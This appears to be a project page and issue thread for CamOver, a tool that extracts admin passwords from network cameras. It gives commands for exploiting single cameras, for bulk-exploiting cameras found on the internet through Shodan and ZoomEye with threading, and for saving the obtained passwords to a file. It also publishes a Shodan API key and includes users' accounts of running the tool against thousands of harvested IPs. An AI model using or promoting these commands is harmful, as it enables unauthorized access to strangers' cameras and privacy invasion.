CamOver is a camera exploitation tool that allows to disclosure network camera admin password.



CamOver is a camera exploitation tool that allows to disclosure network camera admin password.


  • Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.


pip3 install git+

Basic usage

To use CamOver just type camover in your terminal.

usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
               [--zoomeye ZOOMEYE] [-p PAGES]

CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.

optional arguments:
  -h, --help            show this help message and exit
  -t, --threads         Use threads for fastest work.
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.


Exploiting single camera

Let's hack my camera just for fun.

camover -a

Exploiting cameras from Internet

Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with -t for fast exploitation.

camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)

Exploiting cameras from input file

Let's try to use opened database of cameras with -t for fast exploitation.

camover -t -i cameras.txt -o passwords.txt

NOTE: It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

API usage

CamOver also has their own Python API that can be invoked by importing CamOver to your code.

from camover import CamOver

Basic functions

There are all CamOver basic functions that can be used to exploit specified camera.

  • exploit(address) - Exploit single camera by given address.


Exploiting single camera

from camover import CamOver

camover = CamOver()
creds = camover.exploit('')


Other tools

  • why creds was none?

    why creds was none?

    Holle! Excuse me.

    Python 3.10.4 (main, Mar 25 2022, 15:08:58) [Clang 12.0.8 ( c935d99d7 on linux Type "help", "copyright", "credits" or "license" for more information.

    from camover import CamOver camover = CamOver() creds = camover.exploit('') print(creds) (None, None) creds = camover.exploit('') print(creds) (None, None)

    #""was my camera address,it was online. why creds was none? thanks, please.

    opened by wr0x00 4
  • No output

    No output

    Not sure what is going on but I got a list of cams and put them inside a txt and ran a command with and without threads and I'm not getting any output file even if I change the outputs name and refresh it doesn't seem to be making the list for some reason. Earlier I ran it for the first time and it got an output with only 1 ip but now i can't even get any output

    camover -t -i test.txt --output newlist.txt

    I run this and I get nothing outputted.

    opened by SinThroughCode 2
  • Confused


    I ran my own list of IPs and it returned a result of zero passwords for any of them and so I started trying to use the single brute method on around 30 of them and all said not vulnerable. So i tested it with expcamera and each IP I entered in that list was bruted with zero problem. I'm unsure of what would cause this and I know for a fact this list of 2k ips which is fresh from zoomeye are all mostly vulnerable considering I'm screening the same list on expcam right now and its still getting the passwords fine.

    opened by SinThroughCode 1
  • Directory: : does not exist!

    Directory: : does not exist!

    Why does it prompt that the directory does not exist when I execute the following command? Where to put password.txt in which directory

    :~$ camover --shodan (My API_KEY) -o password.txt [-] Directory: : does not exist!

    opened by ChhR00 1
  • When I install the program, I encounter this problem, how can I solve it?

    When I install the program, I encounter this problem, how can I solve it?

    [email protected]:~# pip3 install git+ Collecting git+ Cloning to /tmp/pip-req-build-zchrgnp4 Running command git clone -q /tmp/pip-req-build-zchrgnp4 fatal: unable to access '': Could not resolve host: ERROR: Command errored out with exit status 128: git clone -q /tmp/pip-req-build-zchrgnp4 Check the logs for full command output.

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  • Search Shodan by Country/City

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    Is there any way to search in Shodan by country and/or city?

    In the past, when Entynet Project was alive, I remember editing the source of Entropy to modify the Shodan.query but I can't find a way.

    Any help is welcomed.


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  • Failed to Authorize Shodan

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    Any ideas ?

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